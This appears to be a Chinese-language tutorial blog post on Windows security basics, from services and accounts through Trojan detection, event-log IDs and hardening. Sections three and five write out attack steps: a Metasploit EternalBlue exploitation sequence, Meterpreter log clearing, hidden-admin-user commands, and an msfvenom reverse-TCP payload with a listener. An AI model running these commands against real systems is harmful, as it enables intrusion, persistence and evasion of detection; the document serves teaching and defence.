Windows系统基础
在企业内网与个人办公场景中,Windows系统占据绝对主流地位,也成为渗透测试与安全防护的核心战场。本文从系统基础认知、经典漏洞利用、账户权限管控、木马排查、日志分析到防御加固,一站式梳理Windows安全核心知识,兼顾学习与实战。
一、为什么要学Windows系统基础安全?
-
应用场景极广:企业服务器、办公电脑、工业控制设备、医疗终端大量使用Windows,是内网攻防必争之地。
-
底层逻辑关键:理解系统版本、服务、账户、权限,才能吃透漏洞原理,避免“只会用工具、不懂原理”。
-
应急响应刚需:日常安全运维、勒索病毒处置、入侵溯源都依赖Windows基础安全能力。
二、Windows系统核心基础认知
1. 主流操作系统对比
| 系统 | 特点 | 典型场景 |
|---|---|---|
| Windows | 图形友好、兼容性强 | 企业服务器、办公终端、工业设备 |
| Linux | 开源稳定、安全性高 | 服务器、渗透测试环境 |
| macOS | 生态闭环、体验佳 | 设计、开发工作站 |
2. 版本差异与渗透关注点
-
老旧系统(Win7/Server 2008):已停止支持,漏洞多、防御弱,易成为内网突破口。
-
现代系统(Win10/11/Server 2019+):TPM 2.0、BitLocker、行为检测加持,攻击难度大幅提升。
-
服务器系统:SMB、RDP、IIS等服务是高危入口,域控制器更是核心目标。
3. 高频危险服务
-
RDP远程桌面:默认3389端口,弱密码、未限IP极易被暴力破解。
-
SMB文件共享:139/445端口,经典漏洞“永恒之蓝”的核心载体。
三、经典漏洞实战:MS17-010永恒之蓝
1. 漏洞背景
2017年爆发,利用SMBv1协议远程代码执行漏洞,无需交互即可入侵,衍生WannaCry勒索病毒席卷全球。
2. 渗透利用流程(Kali+Win7)
-
漏洞扫描
nmap --script smb-vuln* 目标IP
-
启动MSF
msfconsole
-
加载模块
use exploit/windows/smb/ms17_010_eternalblue set rhosts 目标IP run
-
获取Meterpreter会话,执行文件下载、截屏、提权、清日志等操作。
3. Meterpreter常用命令
-
ps:查看进程 -
screenshot:截屏 -
shell:获取CMD -
clearev:清除系统日志 -
download/upload:文件传输
四、Windows账户与权限安全
1. 账户权限等级
-
管理员:完全控制,可改系统、装软件、管用户。
-
标准用户:仅操作个人文件,无法改核心配置。
-
来宾:权限最低,默认禁用。
2. 常用CMD账户命令
-
net user:查看所有用户 -
net user 用户名 密码 /add:创建用户 -
net localgroup administrators 用户名 /add:加入管理员组 -
net user 用户名$ 密码 /add:创建隐藏用户
3. 高危后门:影子用户
通过注册表复制管理员权限信息,创建无痕迹的高权限隐藏账户,常规排查难以发现,需检查SAM\Domains\Account\Users\Names注册表路径。
五、第三方应用漏洞与木马攻防
1. 典型案例:向日葵远程控制漏洞
受影响版本≤11.0.0.33,随机端口40000-65535,可直接获取System权限,及时更新软件即可防御。
2. 木马制作与控制(MSF)
-
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=端口 -f exe > shell.exe
-
开启监听
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp run
-
植入方式:社会工程学、共享文件夹、漏洞利用。
3. 木马快速排查
-
进程:Ctrl+Shift+Esc查看陌生/高占用进程
-
网络:
netstat -ano查异常连接 -
启动项:任务管理器-启动、注册表Run项
-
计划任务:
taskschd.msc查可疑自启任务
六、Windows日志分析与应急响应
1. 日志打开方式
Win+R输入eventvwr打开事件查看器,重点关注安全日志。
2. 关键事件ID
-
4625:登录失败(暴力破解)
-
4624:登录成功(异常登录)
-
4720:创建用户(隐藏账户)
-
4732:加入管理员组(权限提升)
-
4688:新进程创建(木马启动)
3. 应急响应核心流程
发现异常→定位威胁→清除威胁→加固防护
七、Windows系统安全加固方案
1. 网络层
-
拦截139/445/3389等危险端口
-
RDP修改默认端口,配置IP白名单
-
启用Windows防火墙
2. 账户层
-
密码≥12位,大小写+数字+符号
-
启用登录锁定:5次错误锁定30分钟
-
禁用来宾账户,定期排查隐藏用户
3. 系统层
-
开启自动更新,及时打补丁
-
禁用SMBv1协议
-
启用安全审核策略
4. 终端层
-
启用Windows Defender/安装火绒
-
不点开陌生附件与链接
-
定期查杀与日志审计
八、学习总结
Windows安全的核心是吃透基础、攻防结合:老旧系统重点堵漏洞,新系统强防护;日常运维重权限、端口、日志三要素,应急响应按流程快速处置。掌握这套知识,既能应对渗透测试,也能做好企业内网安全防护。
更多推荐
所有评论(0)